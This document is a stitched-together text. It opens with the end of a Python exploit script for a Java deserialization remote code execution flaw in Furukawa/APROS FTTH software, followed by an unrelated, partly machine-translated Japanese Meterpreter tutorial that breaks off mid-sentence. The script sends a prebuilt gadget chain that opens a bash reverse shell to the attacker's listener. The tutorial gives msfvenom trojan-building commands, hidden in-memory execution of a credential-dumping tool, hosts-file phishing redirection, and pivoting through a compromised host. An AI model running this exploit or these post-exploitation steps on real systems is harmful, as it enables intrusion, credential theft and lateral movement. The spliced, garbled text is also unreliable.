        # All fields are filled in later: par() and check() set the target
        # details, gadget() sets cmd and headers.
        self.callback = None   # LHOST that the deserialized command connects back to
        self.headers = None    # HTTP headers used by gadget()
        self.payload = None    # not used; gadget() keeps its payload in a local
        self.target = None     # RHOST[:RPORT], prefixed with http:// by par() if missing
        self.lport = None      # LPORT bound by allears()
        self.path = None       # "/FURUKAWA/" or "/APROS/", chosen by check()
        self.cmd = None        # command string spliced into the payload by gadget()

    def allears(self):
        """Listener thread: wait once on 0.0.0.0:lport for the callback.

        Gives up after the 8-second accept timeout (treated as "not vulnerable")
        and exits the process; otherwise hands the accepted socket to telnetlib
        for interactive use and closes it when interaction ends.
        """
        telnetus = telnetlib.Telnet()
        print("[*] Starting handler on port {}".format(self.lport))
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(("0.0.0.0", self.lport))
        while True:
            try:
                s.settimeout(8)
                s.listen(1)
                conn, addr = s.accept()
                print("[*] Connection from {}:{}".format(addr[0], addr[1]))
                telnetus.sock = conn
            except socket.timeout as p:
                print("[!] Probably not vulnerable... ({poraka})".format(poraka=p))
                print("[+] Check your port mappings.")
                s.close()
                exit(0)
            # Only one connection is ever accepted; the loop body runs once.
            break
        print("[*] You got shell!")
        #
        # UnicodeDecodeError dirty fix:
        # /usr/lib/python3.6/telnetlib.py
        # Change from 'ascii' to 'utf-8' (Lines: 553 and 556)
        #
        telnetus.interact()
        conn.close()

    def thricer(self):
        """Start allears() on a child thread, wait one second, then run gadget()."""
        print("[*] Starting callback listener child thread")
        konac = threading.Thread(name="ZSL", target=self.allears)
        konac.start()
        sleep(1)
        self.gadget()

    def gadget(self):
        """Build the serialized object and send it as the ViewState.

        The byte string below is a pre-built Java serialization stream: the
        embedded class names (commons-collections TiedMapEntry / LazyMap /
        ChainedTransformer / ConstantTransformer / InvokerTransformer, then
        java.lang.Runtime with getRuntime / getMethod / invoke / exec) show a
        transformer chain that ends in Runtime.exec of the spliced-in command.
        The stream is gzip-compressed and base64-encoded before being posted
        under ``javax.faces.ViewState``. The HTTP response is not inspected;
        success is judged only by the callback arriving in allears().
        """
        # Command the chain executes on the server: a bash reverse shell to callback:lport.
        self.cmd = "/bin/bash -c /bin/bash${IFS}-i>&/dev/tcp/"
        self.cmd += self.callback
        self.cmd += "/"
        self.cmd += str(self.lport)
        self.cmd += "<&1"
        payload = b"\xAC\xED\x00\x05\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C"
        payload += b"\x2E\x48\x61\x73\x68\x53\x65\x74\xBA\x44\x85\x95\x96\xB8\xB7\x34\x03"
        payload += b"\x00\x00\x78\x70\x77\x0C\x00\x00\x00\x02\x3F\x40\x00\x00\x00\x00\x00"
        payload += b"\x01\x73\x72\x00\x34\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63"
        payload += b"\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E"
        payload += b"\x73\x2E\x6B\x65\x79\x76\x61\x6C\x75\x65\x2E\x54\x69\x65\x64\x4D\x61"
        payload += b"\x70\x45\x6E\x74\x72\x79\x8A\xAD\xD2\x9B\x39\xC1\x1F\xDB\x02\x00\x02"
        payload += b"\x4C\x00\x03\x6B\x65\x79\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61"
        payload += b"\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C\x00\x03\x6D\x61\x70\x74"
        payload += b"\x00\x0F\x4C\x6A\x61\x76\x61\x2F\x75\x74\x69\x6C\x2F\x4D\x61\x70\x3B"
        payload += b"\x78\x70\x74\x00\x26\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x69\x74\x68"
        payload += b"\x75\x62\x2E\x63\x6F\x6D\x2F\x6A\x6F\x61\x6F\x6D\x61\x74\x6F\x73\x66"
        payload += b"\x2F\x6A\x65\x78\x62\x6F\x73\x73\x20\x73\x72\x00\x2A\x6F\x72\x67\x2E"
        payload += b"\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F"
        payload += b"\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x6D\x61\x70\x2E\x4C\x61\x7A"
        payload += b"\x79\x4D\x61\x70\x6E\xE5\x94\x82\x9E\x79\x10\x94\x03\x00\x01\x4C\x00"
        payload += b"\x07\x66\x61\x63\x74\x6F\x72\x79\x74\x00\x2C\x4C\x6F\x72\x67\x2F\x61"
        payload += b"\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F\x63\x6F\x6C"
        payload += b"\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72"
        payload += b"\x6D\x65\x72\x3B\x78\x70\x73\x72\x00\x3A\x6F\x72\x67\x2E\x61\x70\x61"
        payload += b"\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65"
        payload += b"\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x43"
        payload += b"\x68\x61\x69\x6E\x65\x64\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72"
        payload += b"\x30\xC7\x97\xEC\x28\x7A\x97\x04\x02\x00\x01\x5B\x00\x0D\x69\x54\x72"
        payload += b"\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x73\x74\x00\x2D\x5B\x4C\x6F\x72"
        payload += b"\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F"
        payload += b"\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73"
        payload += b"\x66\x6F\x72\x6D\x65\x72\x3B\x78\x70\x75\x72\x00\x2D\x5B\x4C\x6F\x72"
        payload += b"\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E"
        payload += b"\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x54\x72\x61\x6E\x73"
        payload += b"\x66\x6F\x72\x6D\x65\x72\x3B\xBD\x56\x2A\xF1\xD8\x34\x18\x99\x02\x00"
        payload += b"\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3B\x6F\x72\x67\x2E\x61\x70"
        payload += b"\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C"
        payload += b"\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E"
        payload += b"\x43\x6F\x6E\x73\x74\x61\x6E\x74\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D"
        payload += b"\x65\x72\x58\x76\x90\x11\x41\x02\xB1\x94\x02\x00\x01\x4C\x00\x09\x69"
        payload += b"\x43\x6F\x6E\x73\x74\x61\x6E\x74\x71\x00\x7E\x00\x03\x78\x70\x76\x72"
        payload += b"\x00\x11\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x52\x75\x6E\x74\x69"
        payload += b"\x6D\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72"
        payload += b"\x00\x3A\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D"
        payload += b"\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66"
        payload += b"\x75\x6E\x63\x74\x6F\x72\x73\x2E\x49\x6E\x76\x6F\x6B\x65\x72\x54\x72"
        payload += b"\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x87\xE8\xFF\x6B\x7B\x7C\xCE\x38"
        payload += b"\x02\x00\x03\x5B\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5B\x4C\x6A"
        payload += b"\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C"
        payload += b"\x00\x0B\x69\x4D\x65\x74\x68\x6F\x64\x4E\x61\x6D\x65\x74\x00\x12\x4C"
        payload += b"\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B"
        payload += b"\x5B\x00\x0B\x69\x50\x61\x72\x61\x6D\x54\x79\x70\x65\x73\x74\x00\x12"
        payload += b"\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73"
        payload += b"\x3B\x78\x70\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E"
        payload += b"\x67\x2E\x4F\x62\x6A\x65\x63\x74\x3B\x90\xCE\x58\x9F\x10\x73\x29\x6C"
        payload += b"\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0A\x67\x65\x74\x52\x75"
        payload += b"\x6E\x74\x69\x6D\x65\x75\x72\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2E\x6C"
        payload += b"\x61\x6E\x67\x2E\x43\x6C\x61\x73\x73\x3B\xAB\x16\xD7\xAE\xCB\xCD\x5A"
        payload += b"\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4D"
        payload += b"\x65\x74\x68\x6F\x64\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x02\x76\x72"
        payload += b"\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E"
        payload += b"\x67\xA0\xF0\xA4\x38\x7A\x3B\xB3\x42\x02\x00\x00\x78\x70\x76\x71\x00"
        payload += b"\x7E\x00\x1B\x73\x71\x00\x7E\x00\x13\x75\x71\x00\x7E\x00\x18\x00\x00"
        payload += b"\x00\x02\x70\x75\x71\x00\x7E\x00\x18\x00\x00\x00\x00\x74\x00\x06\x69"
        payload += b"\x6E\x76\x6F\x6B\x65\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x02\x76\x72"
        payload += b"\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x62\x6A\x65\x63"
        payload += b"\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00"
        payload += b"\x7E\x00\x18\x73\x71\x00\x7E\x00\x13\x75\x72\x00\x13\x5B\x4C\x6A\x61"
        payload += b"\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\x3B\xAD\xD2"
        payload += b"\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00"
        # One length byte, then the command itself, as the string argument of the chain.
        payload += (bytes(chr(len(self.cmd)), "utf-8"))
        payload += (bytes(self.cmd, "utf-8"))
        payload += b"\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x01"
        payload += b"\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x0F\x73\x72\x00\x11\x6A\x61"
        payload += b"\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x49\x6E\x74\x65\x67\x65\x72\x12\xE2"
        payload += b"\xA0\xA4\xF7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6C\x75\x65"
        payload += b"\x78\x72\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4E\x75\x6D"
        payload += b"\x62\x65\x72\x86\xAC\x95\x1D\x0B\x94\xE0\x8B\x02\x00\x00\x78\x70\x00"
        payload += b"\x00\x00\x01\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E"
        payload += b"\x48\x61\x73\x68\x4D\x61\x70\x05\x07\xDA\xC1\xC3\x16\x60\xD1\x03\x00"
        payload += b"\x02\x46\x00\x0A\x6C\x6F\x61\x64\x46\x61\x63\x74\x6F\x72\x49\x00\x09"
        payload += b"\x74\x68\x72\x65\x73\x68\x6F\x6C\x64\x78\x70\x3F\x40\x00\x00\x00\x00"
        payload += b"\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x78"
        # gzip, then base64: the form the ViewState field is sent in.
        jbits = BytesIO()
        with gzip.GzipFile(fileobj=jbits, mode="wb") as f:
            f.write(payload)
        serialize = base64.b64encode(jbits.getvalue())
        print("[*] Sending serialized object")
        # Fixed header values; the Accept and User-Agent strings are stable
        # indicators of this script in web-server logs.
        self.headers = {
            "Accept" : "text/html,application/xhtml+xml,application/xml;q=1.pwn",
            "Content-Type" : "application/x-www-form-urlencoded",
            "User-Agent" : "ISP-Eye/2.51",
            "Connection" : "keep-alive"}
        self.paramz={"javax.faces.ViewState" : serialize}
        #sleep(1)
        # The response body and status are ignored; see allears() for the success path.
        r = requests.post(self.target + self.path, headers=self.headers, data=self.paramz)

    def par(self):
        """Read target, callback host and listener port from argv (exits via usage() otherwise)."""
        if len(sys.argv) != 4:
            self.usage()
        else:
            self.target = sys.argv[1]
            self.callback = sys.argv[2]
            self.lport = int(sys.argv[3])
            # Accept a bare host[:port]; only the scheme is added here.
            if not "http" in self.target:
                self.target = "http://{}".format(self.target)

    def check(self):
        """Fetch the target root and choose the application path from its body.

        Exits when neither marker string is present or when the request itself
        fails. This probe (a GET to the site root followed by the POST) is the
        first request a defender would see from this script.
        """
        print("[*] Setting up valid URL path")
        try:
            r = requests.get(self.target)
            app = r.text
            if not "FURUKAWA" in app and not "APROS" in app:
                print("[!] App not detected.")
                exit(0)
            if "FURUKAWA" in app:
                self.path = "/FURUKAWA/"
            elif "APROS" in app:
                self.path = "/APROS/"
            else:
                # Unreachable: the guard above already exits when both markers are absent.
                exit(-1337)
        except Exception as p:
            print("[!] Somethingz wrong: \n--\n{poraka}".format(poraka=p))
            exit(0)

    def framed(self):
        """Print the banner (kept as the author's single collapsed string)."""
        naslov = """ o===--------------------------------------===o | | | Furukawa Electric / Tecnored | | APROS Evolution | FURUKAWA | ConsciusMAP | | Fiber-To-The-Home (FTTH) | | | | Java Deserialization Remote Code Execution | | ZSL-2020-5565 | | | o===--------------------------------------===o || || (\__/)|| (•ㅅ•)|| / づ| """
        print(naslov)

    def usage(self):
        """Print the banner and argument syntax, then exit."""
        self.framed()
        print("Usage: ./furukawa.py <RHOST[:RPORT]> <LHOST> <LPORT>")
        print("Example: ./furukawa.py 172.16.0.1:8080 172.16.0.200 4444\n")
        exit(0)

    def main(self):
        """Entry point: parse arguments, detect the app path, start listener and send."""
        self.par()
        self.check()
        self.thricer()


if __name__ == '__main__':
    Optics().main()
タイトル:MeterPreterコマンド詳細説明
0x01pirst学習メータープレーター 1.1.メータープレターとは何ですか MeterPreterは、MetaSploitフレームワークの拡張モジュールです。オーバーフローが成功した後、攻撃ペイロードとして使用されます。オーバーフロー攻撃が成功した後、攻撃ペイロードはコントロールチャネルを返します。攻撃のペイロードとして使用すると、ターゲットシステムのメータープレターシェルへのリンクを取得できます。 MeterPreter Shellには、ユーザーの追加、何かの隠れ、ユーザーのパスワードの開き、リモートホストのファイルのアップロードとダウンロード、CMD.exeの実行、画面のキャプチャ、リモートコントロールのキャプチャ、キー情報の取得、キー情報の取得、アプリケーションのクリア、リモートホストのシステム情報の表示などのマシンなどのインターフェースの表示などの表示など、浸透モジュールとして多くの有用な機能があります。リモートホストに身を隠すと、システムハードディスク内のファイルが変更されないため、HIDS [ホストベースの侵入検知システム]が応答することは困難です。 In addition, the system time varies when it is running, so tracking it or terminating it can also become very difficult for an experienced person. 最後に、MeterPreterは複数のセッションを作成するタスクを簡素化することもできます。これらのセッションは、浸透に使用できます。 Metasploitフレームワークでは、MeterPreterは浸透後のツールであり、動作中に動作中に拡張できる動的でスケーラブルなペイロードです。このツールは、「メモリDLLインジェクション」の概念に基づいて実装されています。これにより、ターゲットシステムは、新しいプロセスを作成し、注入されたDLLを呼び出すことにより、注入されたDLLファイルを実行できます。その中で、ターゲットデバイス内の攻撃者とメータープレターとの間の通信は、ステージャーソケットを介して実装されています。浸透後モジュールとしてはメータープレターには多くの種類があり、コマンドはコアコマンドと拡張ライブラリコマンドで構成されており、攻撃方法を大幅に濃縮しています。 MeterPreterを説明する必要がある場合、脆弱性が正常に活用された後、コードの第2フェーズとMeterPreterサーバーDLLが送信されます。したがって、ネットワークの不安定な場合、多くの場合、実行可能なコマンドがないか、セッションの確立とヘルプの実行が欠落していることがわかります。これは、VPNに接続し、イントラネットでPSEXECとBIND_TCPを使用するときにしばしば発生します。 1.2.meterpreterテクノロジーの利点 MetaSploitは、WindowsやLinuxなどのさまざまな主流プラットフォームのメータープレターバージョンを提供し、X86およびX64プラットフォームをサポートしています。さらに、MeterPreterはPHP言語とJava言語に基づいた実装も提供しています。 MeterPreterの作業モードは純粋なメモリであり、利点は起動して隠されていることです。これは、ウイルス対策ソフトウェアで監視することが困難です。ターゲットホストディスクにアクセスする必要はないため、侵入の兆候はありません。上記に加えて、MeterPreterはRuby Scripting Extensionsもサポートしています。したがって、ルビー言語はまだ必要です。 0x02メータープレーターの一般的なリバウンドタイプ 1.Reverse_TCP これはTCPベースのバックリンクリバウンドシェルであり、使用するのが非常に安定しています (1)Linux: 次のコマンドを使用して、Linuxの下でリバウンドシェルトロイの木馬を生成します。 msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.102 lport=4444 -f elf -o shell 上の写真を見ると、TrojanファイルのISShellがディレクトリで正常に生成されていることがわかります。次に、ファイルに実行可能な権限を追加します。次に、MetaSploitを開き、モジュールハンドラーを使用して、ペイロードを設定します。注:ここのペイロードセットは、トロイの木馬を生成するために使用するペイロードと同じでなければなりません。 
アドレスとポートを設定すると、リスニングを開始します ここでリバウンドシェルトロイの木馬を実行すると、シェルにリバウンドされたことがわかります。 (2)Windows: msfvenom -p windows/meterpreter/reverse_tcp lhost=[your ip] lport=[port] -f exe -oファイル名を生成する MSFVENOM -P Windows/MeterPreter/Reverse_TCP LHOST=192.168.1.102 LPORT=4444 -F EXE -O SHELL.EXE リバース接続シェルは使用するのが非常に安定しているため、LHOSTを設定する必要があります 2.Reverse_http HTTPメソッドに基づく逆接続は、ネットワーク速度が遅い場合、不安定です。 payload:/windows/meterpreter/reverse_http 3.Reverse_Https HTTPSメソッドに基づく逆接続は、ネットワーク速度が遅い場合、不安定です。 HTTPSがリバウンドする場合は、リスニングポートを443に変更してみてください。 payload:/windows/meterpreter/reverse_https 4.bind_tcp これは、TCPに基づくフォワード接続シェルです。イントラネットがネットワークセグメントを横断しているときに攻撃機に接続できないため、イントラネットでよく使用され、LHOSTの設定を必要としません。 次のコマンドを使用して、トロイの木馬を生成します。 msfvenom -p linux/x86/meterpreter/bind_tcp lport=4444 -f elf -o shell 同じことは、権限で実行され、デモンストレーションはありません。 ここで、設定したIPアドレスとポートはターゲットマシンからのものであることに注意してください。これが私たちがそれをつなぐためにイニシアチブをとるものだからです。 0x03関連ペイロード ペイロードには、リモートシステムで実行する必要がある悪意のあるコードが含まれています。 Metasploitでは、ペイロードはモジュールを悪用するために実行できる特別なモジュールであり、ターゲットシステムのセキュリティの脆弱性を活用して攻撃を実装できます。要するに、このエクスプロイトモジュールはターゲットシステムにアクセスでき、そのコードはターゲットシステムでのペイロードの動作を定義します。 Metasploitには、ペイロードモジュールには3つの主要なタイプがあります。 -シングル - スターガー -ステージ シングルは完全に独立したペイロードであり、システムユーザーの追加やファイルの削除など、calc.exeを実行するのと同じくらい簡単です。シングルのため ペイロードは完全に独立しているため、NetCatのような非メタプロイト処理ツールに捕まることがあります。 Stager Payloadsは、ターゲットユーザーと攻撃者間のネットワーク接続を確立し、追加のコンポーネントまたはアプリケーションをダウンロードする責任があります。一般的なステージャーのペイロードはReverse_TCPです。これにより、ターゲットシステムは攻撃者とのTCP接続を確立できます。別の一般的なタイプはbind_tcpです。これにより、ターゲットシステムはTCPリスナーを有効にし、攻撃者はいつでもターゲットシステムと通信できます。 ステージはステージャーです ペイロードによってダウンロードされたペイロードコンポーネントこのペイロードは、サイズ制限なしでより高度な機能を提供できます。 Metasploitでは、ペイロードの名前と使用される形式でそのタイプを推測できます。 単一ペイロードの形式はターゲット/シングルです ステイガー/ステージペイロード形式は、ターゲット/ステージ/ステイガーです Metasploitで「Payloadsを表示」コマンドを実行すると、利用可能なペイロードのリストが表示されます。 このリストでは、Windows/PowerShell_Bind_TCPは単一のペイロードであり、ステージのペイロードは含まれていません。 Windows/x64/meterpreter/reverse_tcpはステイガーです ペイロード(Reverse_TCP)とステージペイロード(MeterPreter)。 0x04メータープレーターの共通コマンド 1。基本コマンド ヘルプ#MeterPreterヘルプを確認してください バックグラウンド#返品、ハングメータープレターの背景 
bgkill #バックグラウンドで実行中のMeterPreterスクリプトを終了します bglist #実行中のすべてのバックグラウンドスクリプトの一覧を表示します bgrun #バックグラウンドスレッドとしてスクリプトを実行します channel #アクティブなチャネルを表示します sessions -i 番号 #セッションと対話します。番号はn番目のセッションを意味します。sessions -i を使用して、指定したシーケンス番号のMeterPreterセッションに接続し続けます。 sessions -k 番号 #interact with Conversation close #チャネルを閉じます exit #MeterPreterセッションを終了します quit #MeterPreterセッションを終了します interact id #指定したチャネルとの対話に切り替えます run #既存のモジュールを実行します。ここで言いたいのは、run と入力してタブを2回押すと、既存のすべてのスクリプトが一覧表示されるということです。一般的に使用されるものには、autoroute、hashdump、arp_scanner、multi_meter_inject などが含まれます。 irb #Rubyスクリプトモードに入ります read #チャネルのデータを読み取ります write #チャネルにデータを書き込みます MeterPreterスクリプトを選択した後、run および bgrun #前景および背景での実行 use #MeterPreterの拡張機能をロードします load #モジュールをロード/使用します resource #既存のRCスクリプトを実行します 2。ファイルシステムコマンド cat c:\boot.ini #ファイルの内容を表示します。ファイルが存在する必要があります del c:\boot.ini #指定されたファイルを削除します upload /root/desktop/netcat.exe c:\ #setup.exeのアップロードなど、ファイルをターゲットホストにアップロードします download c:\\windows\\system32\\nimeia.txt /root/desktop/ #download c:\\boot.ini /root/ や download c:\\'programfiles'\\tencent\\qq\\users\\295******125\\msg2.0.db /root/ など、ファイルをローカルマシンにダウンロードします edit c:\boot.ini #ファイルを編集します getlwd #ローカルディレクトリを表示します getwd #作業ディレクトリを表示します lcd #ローカルディレクトリを変更します ls #現在のディレクトリのファイルの一覧を表示します lpwd #ローカルディレクトリを表示します pwd #作業ディレクトリを表示します cd c:\\ #ディレクトリに移動します rm ファイル #ファイルを削除します mkdir dir #被害者システムにディレクトリを作成します rmdir #被害者システムのディレクトリを削除します dir #ターゲットホストのファイルとフォルダー情報を一覧表示します mv #ターゲットホストのファイル名を変更します search -d d:\\www -f web.config #ファイルを検索します。search -d c:\\ -f *.doc など meterpreter > search -f autoexec.bat #ファイルを検索します meterpreter > search -f sea*.bat c:\\xamp\\ enumdesktops #ユーザーのログイン数 (1)ファイルをダウンロードします コマンド「download + ファイルパス」を使用して、ターゲットマシンの対応する権限のパスの下にあるファイルをダウンロードします (2)ファイルをアップロードします 「upload」コマンドは、ファイルをターゲットマシンにアップロードします。図では、ll.txt をターゲットマシンの c:\pp\ にアップロードしました。 (3)ファイルを表示します 「cat ファイル名」は、現在のディレクトリのファイル内容を表示します。コマンドを入力すると、表示しているファイルの内容が返されます。 (4)現在のパスを切り替えて照会します 「pwd」コマンドは、DOSコマンドと同様に現在のパスを照会します。 「cd」コマンドは、下の図に示すように、現在のパスを変更できます。cd .. は、現在のパスの1つ上のディレクトリに切り替えます。 (5)「sysinfo」コマンド
「sysinfo」コマンドは、リモートホストのシステム情報を表示し、コンピューター、システム情報、構造、言語、その他の情報を表示します。リモートホストのオペレーティングシステムはWindows XP Service Pack 2であり、このシステムには多くの脆弱性があることがわかります。 (6)コマンドを実行します 「実行」コマンドは、ターゲットホストのコマンドを実行します。ここで、「execute -H」がヘルプ情報を表示します。 -fは、実行するコマンドを実行することです。 ターゲットホストでプログラムを実行します。たとえば、現在プロセスをExplorer.exeに注入した後、実行ユーザーはスーパーマネージャー管理者です ターゲットホストでメモ帳プログラムを実行しましょう execute -fnotepad.exe 下の図に示すように、メモ帳プログラムがターゲットホストにすぐに表示されます:これはあまりにも明白です。バックグラウンド実行を非表示にする場合は、パラメーター-Hを追加します execute -h -fnotepad.exe この時点で、ターゲットホストのデスクトップは応答しませんでしたが、MeterPreterセッションでPSコマンドを使用してそれを見ました 別のものを見てください。ターゲットホストでCMD.exeプログラムを実行し、隠された方法でメータープレーターセッションで直接対話します。 注文: execute -h -i -fcmd.exe これは、シェルコマンドを使用するのと同じ効果を達成します もう1つのことは、ターゲットホストのメモリでWCE.EXEやTrojanなどのターゲットホストの攻撃プログラムを直接実行して、ターゲットホストのハードディスクで発見または殺されることを避けるためです。 execute -h -m -d notepad.exe -f wce.exe -a '-owce.txt' -dターゲットホストが実行されたときに表示されるプロセス名(変装のため) -mメモリから直接実行します '-owce.txt'は、wce.exeの実行パラメーターです (7)IDLETIMEコマンド 「idletime」コマンドは、ターゲットマシンが現在の操作なしコマンドに期限切れになった時間を表示します。図のディスプレイは、ターゲットホストが9分19秒前に操作を行うことを意味します。 (8)コマンドを検索します 「検索」コマンドは、ターゲットホストの特定のファイルを検索します。このコマンドは、システム全体または特定のフォルダーを検索できます。 「検索-H」コマンドを使用して、検索コマンドのヘルプ情報を表示します。 以下の図では、「検索–F aa.txt」コマンドは、現在のディレクトリにaa.txtファイルとターゲットマシンの現在のディレクトリのサブディレクトリがあるかどうかを確認します。もしそうなら、それはその道を示します。 「検索-f l*.txt C: \\ pp」は、C: \\ ppのLで始まるすべてのTXTファイルと、PPフォルダーの下のすべてのサブファイルを表示します。そのようなファイルがある場合、パスとサイズを返します。 (9)コマンドを編集します VIエディターに電話して、ターゲットホストのファイルを変更する たとえば、ターゲットホストのホストファイルを変更して、ターゲットホストがBaiduにアクセスするときに準備されたフィッシングWebサイトに移動するようにします(実験目的のみ) ping www.baidu.comターゲットホストでは、出てくるターゲットIPは192.168.1.1ですを変更しました 3。ネットワークコマンド ipconfig/ifconfig#IPアドレスを含むネットワークインターフェイスに関する重要な情報を表示します portfwd -h 使用法:portfwd [-h] [add | delete | list | flush] [args] オプション: -lローカルホストをオプトして聴く(オプション) -hヘルプバナー -l聴くためにローカルポートを選択します -p OPTはリモートポートに接続します -rリモートホストを選択して接続します portfwd add -l 4444 -P 3389 -R 192.168.1.102#ポート転送、ローカル監視4444、ターゲットマシン3389をローカル4444に転送 netstat -an | grep "4444 '#view指定されたポートの開口部 rdesktop -U Administrator -P BK#123 127.0.0.1:444444444444 #use rdesktop 
desktop に接続します。-u ユーザー名 -p パスワード rdesktop 127.1.1.0:4444 #リモート接続にはユーザー名とパスワードが必要です route #被害者のルーティングテーブルを表示または変更します route add 192.168.1.0 255.255.255.0 1 #動的ルートを追加します route print #ルーティングテーブルを出力します run get_local_subnets #ターゲットホストのイントラネットIPセグメントの状態 arp #ARPキャッシュテーブルを表示します getproxy #プロキシ設定を取得します (1)portfwd ネットワークコマンドは、IP情報の一覧表示(ipconfig)、ルーティングテーブルの変更(route)、およびポート転送(portfwd)を行います。たとえば、portfwd: ルールを確立した後、ローカルの3344ポートに接続すると、リモートの3389ポートに転送されます。 (2)route route コマンドを使用して、MeterPreterセッションからイントラネットをさらに深く侵入します。MeterPreterのリバウンドセッションを生成したホストは、イントラネット内にある可能性があります。その外側にはNATの層があります。イントラネットの他のホストに対する攻撃を直接開始することはできません。そこで、生成されたMeterPreterセッションをルーティングの踏み台として使用して、イントラネットの他のホストを攻撃できます。 最初に run get_local_subnets コマンドを使用して、侵入したターゲットホストのイントラネットIPセグメントを表示できます。 コマンド:run get_local_subnets 下の図に示すように: そのイントラネットには192.168.249.0/24ネットワークセグメントがありますが、直接アクセスできません。 ルートを追加しましょう。次のホップは、現在取得したホストのセッション(現在5)です。つまり、249ネットワークセグメント宛てのすべての攻撃トラフィックは、侵入したターゲットホストのMeterPreterセッションを通過します。 コマンド:route add 192.168.249.0 255.255.255.0 5 次に、route print を使用してルーティングテーブルを表示します。効果は次のとおりです。 最後に、このルートを介して249ネットワークセグメントにあるMS08-067の脆弱性を持つ別のホストを攻撃し、下の図に示すように、別のイントラネットホスト192.168.249.1を正常に取得できます。 ほとんどの場合、MeterPRを取得します